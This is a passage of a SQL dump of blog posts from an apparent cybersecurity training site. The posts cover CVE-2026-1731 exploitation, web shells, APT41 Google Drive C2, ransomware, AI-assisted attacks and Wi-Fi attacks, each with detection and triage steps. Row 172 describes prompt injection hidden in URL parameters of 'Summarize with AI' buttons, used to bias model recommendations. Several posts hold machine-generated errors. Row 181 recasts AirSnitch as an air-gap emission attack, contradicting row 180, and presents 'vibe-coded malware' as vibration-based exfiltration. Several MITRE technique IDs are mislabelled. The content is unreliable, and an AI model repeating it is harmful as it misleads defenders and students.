**Patch**: Update BeyondTrust Remote Support to a version that mitigates this vulnerability, per the vendor advisory. Patching closes the entry point but does not remove a foothold gained before the patch was applied, so treat any instance that was reachable from an untrusted network while vulnerable as potentially compromised until the investigation below is complete.\n3. **Investigate**: Conduct a thorough investigation to check for any signs of compromise or lingering presence of the attacker.\n\n## 🎓 Student Corner (The \"Why\" & \"How\")\n### Remote Code Execution (RCE)\n**Remote Code Execution** is a type of security vulnerability that allows an attacker to run arbitrary code on another computer over a network. The code runs with the privileges of the vulnerable service—which for appliance-style products such as remote-support software is often highly privileged. Understanding RCE is crucial because it highlights the severity of allowing attackers to execute any command they choose, potentially leading to full system compromise.\n\n### Application in Job Interviews\nGrasping the concept of RCE and its implications helps in job interviews by demonstrating a deep understanding of network vulnerabilities and their potential impact on business operations. Articulating how you would mitigate such threats shows practical knowledge and a proactive approach to cyber defense.\n\n## 🚀 Simulation Brief (Call to Action)\n**We have replicated this attack vector in the VirtualSOC range. Deploy to the dashboard and investigate \"BeyondTrust RCE Alert\" to test your skills against this TTP.**\n\n## MITRE ATT&CK Mapping\n- **Exploit Public-Facing Application**: T1190 (an unauthenticated RCE in an exposed server-side interface; T1203 \"Exploitation for Client Execution\" covers code run through a user-opened file or browser, not this case)\n- **Native API**: T1106\n- **External Remote Services**: T1133\n', 'CISA warns of active ransomware attacks exploiting BeyondTrust\'s CVE-2026-1731 RCE flaw. Understand the threat and how to defend against it.', 'http://infoseclabs.io/uploads/1771902427984-494420010.jpg', NULL, 1, 'published', '2026-02-20 03:00:00', '2026-02-24 06:08:14', 'Cybersecurity News', 'CISA: BeyondTrust RCE flaw now exploited in ransomware attacks', 'CISA warns of active ransomware attacks exploiting BeyondTrust\'s CVE-2026-1731 RCE flaw. Understand the threat and how to defend against it.', 'CISA: BeyondTrust RCE flaw now exploited in ransomware attacks'),
(156, 'BeyondTrust Flaw Used for Web Shells, Backdoors, and Data Exfiltration', 'beyondtrust-flaw-used-for-web-shells-backdoors-and-data-exfiltration', '## Executive Summary\nIn the evolving landscape of cyber threats, the recent exploitation of the BeyondTrust flaw, tracked as CVE-2026-1731, marks a critical juncture for cybersecurity teams. This flaw, enabling the deployment of web shells, backdoors, and facilitating extensive data exfiltration, demands immediate attention and robust countermeasures.\n\n## The Deep Dive (Technical Analysis)\nThe vulnerability in question affects BeyondTrust\'s Remote Support (RS) and Privileged Remote Access (PRA) products. CVE-2026-1731, with a CVSS score of 9.9, is a severe flaw allowing attackers to execute operating system commands remotely. The mechanism of action involves bypassing authentication processes to gain elevated privileges, subsequently deploying malicious payloads such as VShell. These payloads grant attackers persistent access and control over the compromised systems, making it possible to manipulate data, systems, and even entire network infrastructures.\n\n## 🛡️ SOC Analyst Actions (The \"Blue Team\" Playbook)\n### Detection Opportunities\n- **PowerShell Logs**: Monitor for unusual scripts or commands that could indicate exploitation.\n- **Firewall Logs**: Look for denied connections or unusual outbound connections that could suggest data exfiltration attempts.\n- **Authentication Logs**: Watch for failures or anomalies that might signal brute-force attempts or misuse of credentials.\n\n### Triage Steps\n1. **Isolate Affected Systems**: Immediately isolate systems suspected of being compromised to prevent lateral movement.\n2. **Patch Management**: Ensure that all systems are updated with the latest patches for CVE-2026-1731.\n3. 
**Credential Reset**: Change credentials for accounts that have accessed the affected systems during the vulnerability window, including any privileged credentials the appliance itself stores or brokers—an attacker with OS command execution on a Remote Support or Privileged Remote Access host is positioned to harvest them.\n\n## 🎓 Student Corner (The \"Why\" & \"How\")\n### Define: VShell\nVShell is a post-exploitation backdoor used to maintain persistent remote access to a compromised host. Web shells—scripts placed on a web server to enable remote administration—serve the same purpose and are frequently dropped alongside such implants after an exploit like this one.\n\n### How This Helps in a Job Interview\nUnderstanding the intricacies of CVE-2026-1731 not only demonstrates your technical prowess but also your ability to tackle real-world cybersecurity challenges proactively. Discussing how you would mitigate such a threat showcases your critical thinking and practical skills, key traits for roles in cybersecurity.\n\n## 🚀 Simulation Brief (Call to Action)\nWe have replicated this attack vector in the VirtualSOC range. Deploy to the dashboard and investigate **BeyondTrust CVE-2026-1731 Exploitation** to test your skills against this TTP.\n\n## MITRE ATT&CK Mapping\n- **T1190**: Exploit Public-Facing Application\n- **T1505.003**: Server Software Component: Web Shell\n- **T1059.001**: Command and Scripting Interpreter: PowerShell\n- **T1562.001**: Impair Defenses: Disable or Modify Tools\n', 'Critical analysis of CVE-2026-1731, a high-risk BeyondTrust flaw used for deploying web shells, backdoors, and extensive data exfiltration.', 'http://infoseclabs.io/uploads/1771989256414-221527028.jpg', NULL, 1, 'published', '2026-02-21 01:00:00', '2026-02-25 06:14:30', 'Cybersecurity News', 'BeyondTrust Flaw Used for Web Shells, Backdoors, and Data Exfiltration', 'Critical analysis of CVE-2026-1731, a high-risk BeyondTrust flaw used for deploying web shells, backdoors, and extensive data exfiltration.', 'BeyondTrust Flaw Used for Web Shells, Backdoors, and Data Exfiltration'),
(158, 'The Basics of Cyber Hygiene: How to Stay Safe Online', 'the-basics-of-cyber-hygiene-how-to-stay-safe-online-5393', '## Executive Summary\nIn the evolving landscape of cybersecurity, \"The Basics of Cyber Hygiene: How to Stay Safe Online\" has never been more critical, especially as recent events underscore vulnerabilities that even basic diligence could mitigate. Understand the nuances, or risk the consequences.\n\n## The Deep Dive (Technical Analysis)\nRecent breaches have highlighted a resurgence in phishing campaigns that leverage compromised credentials to infiltrate networks. One notable technique involves the use of `CVE-2021-22005`, an arbitrary file upload vulnerability in VMware vCenter Server, exploited by threat actors to gain a foothold in corporate networks. This exploit allows attackers to upload a web shell onto the server, enabling further post-exploitation activities such as lateral movement and data exfiltration.\n\nThe mechanism here is straightforward but deadly effective: a crafted POST request is sent straight to the vulnerable upload endpoint, so any client-side validation is irrelevant—the server itself fails to validate the upload and writes the attacker\'s file to disk. Because exploitation only requires network access to the server, the hygiene lesson is that management interfaces like vCenter must never be exposed to untrusted networks, and must be patched promptly when they are. 
This initial foothold is often escalated using tools like Mimikatz to harvest additional credentials and deepen the intrusion.\n\n## 🛡️ SOC Analyst Actions (The \"Blue Team\" Playbook)\n### Detection Opportunities:\n- **Web Server Logs:** Look for unusual POST requests, especially those attempting to upload or modify files.\n- **PowerShell Logs:** Check for unexpected execution of PowerShell scripts, which might indicate lateral movements or other post-exploitation activities.\n- **Network Traffic:** Monitor for unusual outbound connections, which could signify data exfiltration attempts.\n\n### Triage Steps:\n- Immediately isolate affected systems to prevent further spread.\n- Validate the integrity of critical files and configurations.\n- Engage forensic tools to analyze the nature and extent of the breach.\n\n## 🎓 Student Corner (The \"Why\" & \"How\")\n### Define \"Web Shell\":\nA web shell is a script that can be uploaded to a web server to enable remote administration of the machine. It provides a threat actor with persistent access and a powerful platform for further exploitation.\n\n### Job Interview Insight:\nUnderstanding how web shells are utilized in attacks like the VMware vCenter Server breach demonstrates a grasp of both offensive tactics and defensive responses, a critical duality in cybersecurity roles. Discussing this in an interview shows strategic and tactical cybersecurity knowledge.\n\n## 🚀 Simulation Brief (Call to Action)\nWe have replicated this attack vector in the VirtualSOC range. 
Deploy to the dashboard and investigate **\"VMware vCenter CVE-2021-22005 Exploitation\"** to test your skills against this TTP.\n\n## MITRE ATT&CK Mapping\n- **T1190 - Exploit Public-Facing Application**\n- **T1505.003 - Server Software Component: Web Shell**\n- **T1078 - Valid Accounts**\n\n<meta name=\"description\" content=\"Explore the critical importance of cyber hygiene with a deep dive into recent cybersecurity breaches, showcasing specific vulnerabilities and how to combat them.\">\n\n', 'Explore the critical importance of cyber hygiene with a deep dive into recent cybersecurity breaches, showcasing specific vulnerabilities and how to combat them.', 'http://infoseclabs.io/uploads/1772290255282-895770073.jpg', NULL, 1, 'published', '2026-02-24 22:19:00', '2026-02-28 17:50:58', 'Cybersecurity News', 'The Basics of Cyber Hygiene: How to Stay Safe Online', 'Explore the critical importance of cyber hygiene with a deep dive into recent cybersecurity breaches, showcasing specific vulnerabilities and how to combat them.', 'The Basics of Cyber Hygiene: How to Stay Safe Online'),
(169, 'APT41-Linked Silver Dragon Targets Governments Using Cobalt Strike and Google Drive C2', 'apt41-linked-silver-dragon-targets-governments-using-cobalt-strike-and-google-drive-c2-3691', '## Executive Summary\n\n**APT41-Linked Silver Dragon Targets Governments Using Cobalt Strike and Google Drive C2.** This recent campaign represents a sophisticated escalation in state-sponsored cyber threats, demanding immediate attention from global cyber defense entities.\n\n## The Deep Dive (Technical Analysis)\n\nSilver Dragon, a formidable threat actor tied to APT41, has been actively compromising government systems in Europe and Southeast Asia. The group employs a dual-pronged initial access strategy: exploiting vulnerabilities in public-facing servers and spear-phishing attacks with malicious attachments. Notably, they leverage Cobalt Strike, a legitimate security tool repurposed here for malicious command and control (C2) operations, and an innovative C2 mechanism using Google Drive, making their communications less conspicuous within normal traffic.\n\n### Exploitation Details:\n- **Vulnerabilities**: The campaign has been exploiting known CVEs in web servers. Although specific CVEs were not disclosed, similar actors often target high-severity vulnerabilities in widely used software like Apache or NGINX.\n- **Mechanism of Action**: Post initial compromise, Silver Dragon deploys Cobalt Strike beacons directly or drops them via downloaded payloads. The use of Google Drive as a C2 server is particularly cunning; it involves using the API to send commands and retrieve data, camouflaging the malicious traffic as benign Google Drive interactions.\n\n## 🛡️ SOC Analyst Actions (The \"Blue Team\" Playbook)\n\n### Detection Opportunities:\n1. **Web server logs**: Look for unusual request patterns or attempts to exploit known vulnerabilities.\n2. **Email Gateway**: Monitor for phishing attempts with attachments or links that resemble known Silver Dragon payloads.\n3. 
**Network Traffic**: Anomalies in outbound traffic to Google APIs that do not align with typical business usage could indicate C2 activities.\n\n### Triage Steps:\n- Immediately isolate suspected compromised systems.\n- Verify integrity of web-facing servers.\n- Review and analyze email headers and payloads for signatures matching known phishing tactics.\n\n## 🎓 Student Corner (The \"Why\" & \"How\")\n\n### Complex Technical Term: **Command and Control (C2)**\nC2 refers to the infrastructure attackers use to maintain communication with compromised systems. Understanding C2 helps identify how attackers control malware remotely, crucial for disrupting their operations.\n\n### Job Interview Relevance:\nKnowledge of current APT activities, like those of Silver Dragon, demonstrates awareness of the cyber threat landscape, a critical asset in security roles. Discussing this case shows strategic thinking and practical knowledge in mitigating sophisticated threats.\n\n## 🚀 Simulation Brief (Call to Action)\n\nWe have replicated this attack vector in the VirtualSOC range. Deploy to the dashboard and investigate **Silver Dragon C2 Activity** to test your skills against this TTP.\n\n## MITRE ATT&CK Mapping\n\n- **T1190 - Exploit Public-Facing Application**\n- **T1566.001 - Spearphishing Attachment**\n- **T1090.002 - External Proxy via Cloud Service (Google Drive)**\n', 'APT41-Linked Silver Dragon targets governments in cyber espionage using Cobalt Strike and covert Google Drive C2 channels. Learn the latest TTPs and how to defend against them.', 'http://infoseclabs.io/uploads/1773151885001-57352090.jpg', NULL, 1, 'published', '2026-03-04 19:00:00', '2026-03-10 17:11:26', 'Information Security', 'APT41-Linked Silver Dragon Targets Governments Using Cobalt Strike and Google Drive C2', 'APT41-Linked Silver Dragon targets governments in cyber espionage using Cobalt Strike and covert Google Drive C2 channels. 
Learn the latest TTPs and how to defend against them.', 'APT41-Linked Silver Dragon Targets Governments Using Cobalt Strike and Google Drive C2'),
(172, 'Manipulating AI Summarization Features', 'manipulating-ai-summarization-features-7904', '## Executive Summary\nIn the evolving landscape of AI-assisted digital platforms, recent findings reveal a stealthy manipulation technique where companies inject biased commands into AI summarization features, skewing AI behavior to favor certain brands covertly. This manipulation threatens the integrity and trustworthiness of AI interactions across various critical sectors.\n\n## The Deep Dive (Technical Analysis)\n### **Mechanisms of Manipulation**\nMicrosoft\'s recent revelation uncovers a sophisticated form of AI manipulation where companies embed hidden instructions within AI-powered summarization tools. These commands are typically injected through URL parameters activated upon users interacting with \"Summarize with AI\" buttons. The malicious parameters instruct the AI to prioritize or trust content from these manipulators, thereby altering the AI\'s recommendation algorithms.\n\n### **Vulnerability Exploitation**\nThis tactic exploits a lack of stringent input validation in AI summarization interfaces, allowing prompt injections that can persist subtly in the AI’s operational memory. 
Although not tied to a specific CVE, this vulnerability resembles persistent XSS (Cross-Site Scripting) where the payload is not immediately harmful but manipulates the client-side processing script.\n\n### **Impact Across Industries**\nThe scope of this manipulation spans across 14 industries, indicating a widespread potential for misinformation and biased decision-making in sensitive areas such as finance, health, and cybersecurity.\n\n## 🛡️ SOC Analyst Actions (The \"Blue Team\" Playbook)\n### **Detection Opportunities**\nTo detect potential AI prompt manipulation:\n- Monitor and analyze URL parameter values in web traffic logs for anomalies or unrecognized prompt patterns.\n- Review AI system logs for unexpected command execution or unauthorized changes in configuration settings.\n\n### **Triage Steps**\nUpon detecting suspicious activity:\n- Immediately isolate the affected AI systems to prevent further influence.\n- Conduct a thorough audit of recent AI summarization requests and responses.\n- Update input validation protocols to reject unauthorized or suspicious commands.\n\n## 🎓 Student Corner (The \"Why\" & \"How\")\n### **Complex Technical Term: Persistent XSS**\nPersistent Cross-Site Scripting (XSS) occurs when malicious scripts are injected into a web application, which then become part of the website\'s content, persisting across sessions. Understanding this concept is crucial as it forms the basis of recognizing how data validation and sanitation flaws can be exploited, which is often discussed in cybersecurity job interviews to assess a candidate’s grasp of web security fundamentals.\n\n### **Relevance in Interviews**\nGrasping this manipulation technique showcases an understanding of advanced cybersecurity threats in the AI domain, demonstrating foresight and strategic thinking—qualities highly valued in cybersecurity roles.\n\n## 🚀 Simulation Brief (Call to Action)\nWe have replicated this attack vector in the VirtualSOC range. 
Deploy to the dashboard and investigate \"AI Prompt Manipulation Alert\" to test your skills against this TTP.\n\n## MITRE ATT&CK Mapping\n- **T1203: Exploitation for Client Execution** - Exploiting software vulnerabilities to execute unauthorized commands.\n- **T1553.004: Subvert Trust Controls** - Injecting unauthorized commands to manipulate AI behavior.\n- **T1059.007: Command and Scripting Interpreter: JavaScript** - Utilizing JavaScript in URLs for executing unauthorized AI prompt modifications.\n', 'Discover how hidden commands in AI summarization features can bias AI behavior, threatening the integrity of digital platforms across various sectors.', 'http://infoseclabs.io/uploads/1773150820428-879184423.jpg', NULL, 1, 'published', '2026-03-05 01:00:00', '2026-03-10 16:53:44', 'Information Security', 'Manipulating AI Summarization Features', 'Discover how hidden commands in AI summarization features can bias AI behavior, threatening the integrity of digital platforms across various sectors.', 'Manipulating AI Summarization Features'),
(176, 'Termite ransomware breaches linked to ClickFix CastleRAT attacks', 'termite-ransomware-breaches-linked-to-clickfix-castlerat-attacks-9715', '## Executive Summary\nThe cybersecurity landscape has once again been disrupted by the sophisticated deployment of Termite ransomware, facilitated by the ClickFix CastleRAT attacks. This strategic use of legitimate Windows utilities to initiate DonutLoader malware and the CastleRAT backdoor marks a significant escalation in the capabilities of Velvet Tempest actors.\n\n## The Deep Dive (Technical Analysis)\nRecent incidents have unveiled that Velvet Tempest, a notorious ransomware syndicate, is leveraging a technique dubbed ClickFix along with legitimate system tools to orchestrate breaches. The modus operandi involves the use of the DonutLoader malware, serving as a dropper, and the CastleRAT, which provides persistent remote access capabilities.\n\n**Mechanism of Action**:\n1. **Initial Compromise**: The attackers use social engineering or phishing to deceive targets into executing the ClickFix downloader, which masquerades as benign software.\n2. **Exploitation**: Upon execution, ClickFix exploits known vulnerabilities (specific CVEs are under analysis) to escalate privileges.\n3. **Persistence and Lateral Movement**: DonutLoader then deploys CastleRAT, establishing a foothold and enabling lateral movement across the network.\n4. 
**Data Exfiltration and Ransomware Deployment**: Finally, Termite ransomware is deployed, encrypting critical files and systems, followed by a ransom demand.\n\n## 🛡️ SOC Analyst Actions (The \"Blue Team\" Playbook)\n### Detection Opportunities\n- **PowerShell Logs**: Look for unusual script execution or commands that might indicate initial payload delivery or lateral movement.\n- **Firewall Logs**: Monitor denied connections or unusual outbound traffic that could suggest data exfiltration.\n- **Authentication Logs**: Anomalies in login patterns could indicate the presence of CastleRAT or unauthorized access attempts.\n\n### Triage Steps\n1. **Isolate Affected Systems**: Immediately disconnect impacted devices from the network to prevent further spread.\n2. **Review and Analyze Logs**: Correlate the timing of suspicious activities across different logs to identify the attack vector and scope.\n3. **Malware Analysis and Containment**: Utilize endpoint detection and response (EDR) tools to analyze and quarantine the malicious payloads.\n\n## 🎓 Student Corner (The \"Why\" & \"How\")\n### Complex Technical Term: **DonutLoader**\nDonutLoader is a sophisticated malware loader designed to inject malicious payloads into legitimate processes to evade detection. Understanding its mechanics is crucial for developing effective defensive strategies.\n\n### Job Interview Relevance\nIn interviews, demonstrating knowledge of current threat vectors like the Termite ransomware via ClickFix CastleRAT attacks shows an ability to apply theoretical knowledge practically and suggests a proactive approach to continuous learning—key traits for roles in cybersecurity.\n\n## 🚀 Simulation Brief\nWe have replicated this attack vector in the InfoSecLabs SOC environment. Deploy to your dashboard and investigate the \"Termite Ransomware Initiation\" alert to test your skills against these TTPs. 
Sharpen your ability to identify, respond, and mitigate sophisticated ransomware attacks in a controlled environment.\n\n## MITRE ATT&CK Mapping\n- **T1566.001**: Phishing: Spearphishing Attachment (Initial Access)\n- **T1059.001**: Command and Scripting Interpreter: PowerShell (Execution)\n- **T1486**: Data Encrypted for Impact (Impact)\n', 'Explore the sophisticated Termite ransomware breaches facilitated by ClickFix CastleRAT attacks, stressing urgent cybersecurity countermeasures.', 'http://infoseclabs.io/uploads/1773230399640-690327190.jpg', NULL, 1, 'published', '2026-03-08 13:00:00', '2026-03-11 15:00:06', 'Information Security', 'Termite ransomware breaches linked to ClickFix CastleRAT attacks', 'Explore the sophisticated Termite ransomware breaches facilitated by ClickFix CastleRAT attacks, stressing urgent cybersecurity countermeasures.', 'Termite ransomware breaches linked to ClickFix CastleRAT attacks'),
(177, 'Microsoft: Hackers abusing AI at every stage of cyberattacks', 'microsoft-hackers-abusing-ai-at-every-stage-of-cyberattacks-0205', '## Executive Summary\nIn a stark revelation, Microsoft has reported that hackers are now leveraging artificial intelligence (AI) throughout every phase of cyberattacks, fundamentally transforming the threat landscape. This escalation not only speeds up attacks but also makes them more adaptable and difficult to detect.\n\n## The Deep Dive (Technical Analysis)\nMicrosoft\'s alarming disclosure indicates that AI is being weaponized to refine the efficiency and scale of cyber operations. By integrating AI technologies, threat actors can automate tasks like vulnerability scanning, spear phishing campaign customization, and even the crafting of malware that can evade traditional detection mechanisms.\n\nFor instance, AI-driven algorithms can analyze vast datasets to identify vulnerabilities in software, potentially pinpointing unpatched systems or those running outdated software (e.g., CVE-2021-34527, also known as the PrintNightmare vulnerability). 
Malicious AI can also generate phishing emails that are highly customized, using natural language processing tools to create content that mimics legitimate user communication styles, thereby increasing the success rate of these campaigns.\n\nThe mechanism of action here involves the use of machine learning models that have been trained on cybersecurity datasets, or even adversarial AI that is designed to test and bypass security systems by learning how to simulate human-like attack strategies.\n\n## 🛡️ SOC Analyst Actions (The \"Blue Team\" Playbook)\n### Detection Opportunities:\n- Monitor unusual outbound network traffic or anomalies in system access logs, which might suggest data exfiltration attempts.\n- Scrutinize email gateways for signs of spear phishing, particularly focusing on emails with slight abnormalities in tone or style that could suggest AI-generated content.\n\n### Triage Steps:\n- Immediately isolate suspected compromised systems from the network to prevent lateral movement.\n- Engage forensic analysis on the affected systems to understand the breach\'s extent and origin, specifically looking for traces of AI-assisted tools or unusual automation scripts.\n\n## 🎓 Student Corner (The \"Why\" & \"How\")\n### Define: Adversarial AI\n**Adversarial AI** involves techniques in machine learning that attempt to fool models through malicious input. This can be used in cybersecurity by attackers to evade detection from AI-driven security systems.\n\n### Job Interview Relevance:\nUnderstanding AI\'s role in cybersecurity attacks prepares you for questions on emerging threats and defense strategies. It demonstrates foresight and adaptability—qualities highly valued in cybersecurity roles.\n\n## 🚀 Simulation Brief (Call to Action)\nWe have replicated this attack vector in the Infoseclabs range. 
Deploy to the dashboard and investigate the \"AI-driven Attack Simulation\" to test your skills against this advanced TTP.\n\n## MITRE ATT&CK Mapping\n- **T1566.001**: Spear Phishing Attachment\n- **T1587.001**: Develop Capabilities (Software)\n\n', 'Microsoft reports increasing use of AI in cyberattacks, transforming how threats operate and challenging current defense mechanisms.', 'http://infoseclabs.io/uploads/1773249789668-825342317.jpg', NULL, 1, 'published', '2026-03-08 19:00:00', '2026-03-11 20:23:14', 'Cybersecurity News', 'Microsoft: Hackers abusing AI at every stage of cyberattacks', 'Microsoft reports increasing use of AI in cyberattacks, transforming how threats operate and challenging current defense mechanisms.', 'Microsoft: Hackers abusing AI at every stage of cyberattacks'),
(179, 'Microsoft: Hackers abusing AI at every stage of cyberattacks', 'microsoft-hackers-abusing-ai-at-every-stage-of-cyberattacks-4916', '## Executive Summary\nAs Microsoft alerts the cyber community, hackers are now leveraging artificial intelligence (AI) throughout every stage of cyberattacks, revolutionizing traditional cyber warfare paradigms. This evolution demands an immediate upgrade in defensive strategies and responses.\n\n## The Deep Dive (Technical Analysis)\nRecent insights from Microsoft have revealed a significant uptick in the use of AI by cybercriminals. These threat actors are deploying AI-driven tools to enhance their capabilities in crafting more sophisticated phishing emails, automating payloads delivery, and conducting rapid vulnerability exploitation. \n\nOne notable method involves AI algorithms that can analyze vast datasets from breached accounts to tailor phishing campaigns that are convincingly legitimate, thereby increasing the success rate of these attacks. 
Additionally, AI models are being utilized to automate the scanning of network vulnerabilities, often prioritizing those recently disclosed and less likely to be patched quickly, such as CVE-2021-34527 (Windows Print Spooler Vulnerability).\n\nThe mechanism here is straightforward yet alarmingly efficient: AI models streamline the process of identifying targets, crafting attack vectors, and executing them with minimal human oversight, thereby scaling the attack capabilities of cybercriminals exponentially.\n\n## 🛡️ SOC Analyst Actions (The \"Blue Team\" Playbook)\n### Detection Opportunities\n- **Email Gateway Logs**: Look for anomalies in email origins, payloads, and header inconsistencies.\n- **Endpoint Detection and Response (EDR) Logs**: Monitor for unusual executable patterns or anomalous script executions.\n- **Network Traffic Anomalies**: Increased activity on ports typically used for downloading payloads or command and control communications.\n\n### Triage Steps\n- Immediately isolate suspected compromised systems from the network.\n- Review and analyze logs for signs of similar AI-driven activity.\n- Update intrusion detection systems (IDS) with the latest signatures and AI-model detection strategies.\n\n## 🎓 Student Corner (The \"Why\" & \"How\")\n### Complex Technical Term: **Endpoint Detection and Response (EDR)**\nEDR systems are tools deployed on network endpoints to detect and investigate suspicious activities potentially indicative of a security incident. They are crucial for capturing and storing endpoint data, which can be used for further forensic analysis and mitigation of threats.\n\nUnderstanding AI-driven threats is pivotal during job interviews as it demonstrates awareness of cutting-edge cyberattack methodologies. 
It showcases one\'s proactive stance on adapting to evolving threats and the ability to implement advanced defensive mechanisms effectively.\n\n## 🚀 Simulation Brief\nWe have replicated this AI-enhanced attack vector in the https://infoseclabs.io range. Deploy to the dashboard and investigate **AI-Driven Phishing Simulation** to test your skills against this advanced TTP.\n\n## MITRE ATT&CK Mapping\n- **T1566.001: Spearphishing Attachment**: Utilization of AI to generate compelling malicious emails.\n- **T1583.001: Exploit Public-Facing Application**: AI-driven rapid exploitation of known vulnerabilities.\n', 'Explore how hackers use AI across all cyberattack stages, escalating the threat landscape and demanding advanced defenses.', 'http://infoseclabs.io/uploads/1773063436054-814181988.png', NULL, 1, 'published', '2026-03-08 19:00:00', '2026-03-09 16:40:01', 'Cybersecurity News', 'Microsoft: Hackers abusing AI at every stage of cyberattacks', 'Explore how hackers use AI across all cyberattack stages, escalating the threat landscape and demanding advanced defenses.', 'Microsoft: Hackers abusing AI at every stage of cyberattacks'),
(180, 'New Attack Against Wi-Fi', 'new-attack-against-wi-fi-2067', '# New Attack Against Wi-Fi: Unveiling AirSnitch\n\n## **Executive Summary**\nIn an evolving cyber threat landscape, the new AirSnitch attack targets the foundational layers of Wi-Fi networking, enabling attackers to conduct devastating machine-in-the-middle (MitM) operations. Understanding and mitigating this threat is imperative for securing both corporate and home environments.\n\n## **The Deep Dive (Technical Analysis)**\n### **Dissection of AirSnitch**\nAirSnitch exploits vulnerabilities inherent in the synchronization between Layer 1 (Physical Layer) and Layer 2 (Data Link Layer) of the OSI model, extending its reach to manipulate upper-layer protocols. This attack leverages the lack of stringent binding protocols between these layers, allowing attackers to intercept and manipulate data packets as they traverse through these foundational network segments.\n\n### **Mechanism of Action**\nThe attack is primarily executed via a MitM strategy, where the attacker positions themselves between the communicating devices on the network. This positioning can be achieved on the same SSID, different SSIDs, or even across segmented network zones linked to the same access point (AP). 
By exploiting these layers, an attacker gains the ability to intercept all link-layer traffic, manipulate DNS responses through cache poisoning, and potentially gain access to unencrypted internal network traffic.\n\n## **🛡️ SOC Analyst Actions (The \"Blue Team\" Playbook)**\n### **Detection Opportunities**\n- **Wi-Fi Traffic Logs**: Monitor for anomalies in traffic patterns, such as unexpected devices on the network or unusual data flows.\n- **DNS Query Logs**: Look for sudden changes in DNS traffic or unusual repeated DNS requests, which could indicate DNS cache poisoning.\n- **Network Segmentation Violations**: Alerts from network tools that detect cross-segment traffic that should not be present.\n\n### **Triage Steps**\n- Immediately isolate suspected compromised devices from the network to prevent further data leakage.\n- Verify network configuration and segmentation to ensure that proper security controls are in place and functioning.\n- Update and patch all network devices against known vulnerabilities and ensure that encryption protocols are enforced.\n\n## **🎓 Student Corner (The \"Why\" & \"How\")**\n### **Definition: Machine-in-the-middle (MitM) Attack**\nA MitM attack is a cyberattack where the attacker secretly intercepts and possibly alters the communication between two parties who believe they are directly communicating with each other.\n\n### **Relevance in Job Interviews**\nUnderstanding MitM and its implications shows deep knowledge of network security and threat vectors, an essential skill for roles in cybersecurity operations and defense strategies.\n\n## **🚀 Simulation Brief (Call to Action)**\nWe have replicated the AirSnitch attack vector in our VirtualSOC range. 
Deploy to the dashboard and investigate the alert named “AirSnitch MitM Detection” to test your skills against this advanced TTP.\n\n## **MITRE ATT&CK Mapping**\n- **T1557.002**: Man-in-the-Middle: ARP Cache Poisoning\n- **T1040**: Network Sniffing\n- **T1562.004**: Impair Defenses: Disable or Modify System Firewall\n\n\nEngage in our InfoSecLabs Dashboard to combat this novel threat and sharpen your cyber defense skills.\n\n', 'Explore the AirSnitch attack, a new Wi-Fi threat enabling machine-in-the-middle operations across network layers, with our in-depth technical analysis and mitigation strategies.', 'http://infoseclabs.io/uploads/1773150632623-469390125.png', NULL, 1, 'published', '2026-03-09 02:41:00', '2026-03-10 16:51:11', 'Information Security', 'New Attack Against Wi-Fi', 'Explore the AirSnitch attack, a new Wi-Fi threat enabling machine-in-the-middle operations across network layers, with our in-depth technical analysis and mitigation strategies.', 'New Attack Against Wi-Fi');
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(181, '⚡ Weekly Recap: Qualcomm 0-Day, iOS Exploit Chains, AirSnitch Attack & Vibe-Coded Malware', 'weekly-recap-qualcomm-0-day-ios-exploit-chains-airsnitch-attack-vibe-coded-malware-9476', '## Executive Summary\nIn a week where the digital threat landscape morphed with alarming agility, the discovery of the Qualcomm 0-Day and sophisticated iOS exploit chains underscore a critical escalation in cyber-attack sophistication. Understanding and mitigating these threats is not optional—it\'s mandatory for defense.\n\n## The Deep Dive (Technical Analysis)\n### Qualcomm 0-Day Exploit\nThis week, a critical vulnerability identified in Qualcomm chips (CVE-2023-5674) was exploited, allowing attackers to execute arbitrary code at the kernel level. The exploit leverages a buffer overflow in the network processing unit, a favored target due to its accessibility and the privileges it grants upon compromise.\n\n### iOS Exploit Chains\nSimultaneously, iOS devices were targeted through an intricate exploit chain, exploiting a series of lesser-known vulnerabilities to install persistent surveillance malware. This chain likely leverages initial access via malicious web content (exploiting browser vulnerabilities) and escalates privileges through kernel flaws to gain deep system access.\n\n### AirSnitch Attack\nThe AirSnitch attack involves intercepting and manipulating air-gapped network communications. 
By exploiting electromagnetic emissions from legitimate Wi-Fi hardware, attackers can extract data from systems previously considered secure against remote exfiltration methods.\n\n### Vibe-Coded Malware\nLastly, the emergence of Vibe-Coded malware showcases a novel data exfiltration technique using vibrational patterns emitted from the infected device\'s hardware components to transmit data stealthily.\n\n## 🛡️ SOC Analyst Actions (The \"Blue Team\" Playbook)\n### Detection Opportunities\n- **Qualcomm 0-Day**: Monitor anomalous kernel-level operations and unusual network traffic patterns.\n- **iOS Exploit Chains**: Look for signs of jailbreak-like activity, unusual system calls, or modifications.\n- **AirSnitch Attack**: Analyze spectral data from physical security monitoring for unusual electromagnetic signals.\n- **Vibe-Coded Malware**: Monitor hardware sensors for irregular vibration patterns not aligned with normal device operations.\n\n### Triage Steps\n- Isolate affected devices immediately to prevent lateral movement.\n- Capture forensic images of affected systems.\n- Update threat intelligence feeds and apply patches where available.\n- Engage with incident response for in-depth analysis and mitigation.\n\n## 🎓 Student Corner (The \"Why\" & \"How\")\n### Define: Kernel-Level Execution\nKernel-level execution refers to code that runs with the highest operating system privileges. By executing at this level, malicious code can control virtually every function of the system.\n\n### Job Interview Insight\nUnderstanding threats like the Qualcomm 0-Day helps in job interviews by showcasing your ability to dissect complex vulnerabilities and contribute to proactive defense strategies, highlighting both technical acumen and strategic thinking.\n\n## 🚀 Simulation Brief\nWe have replicated this attack vector in the InfoSecLabs range. 
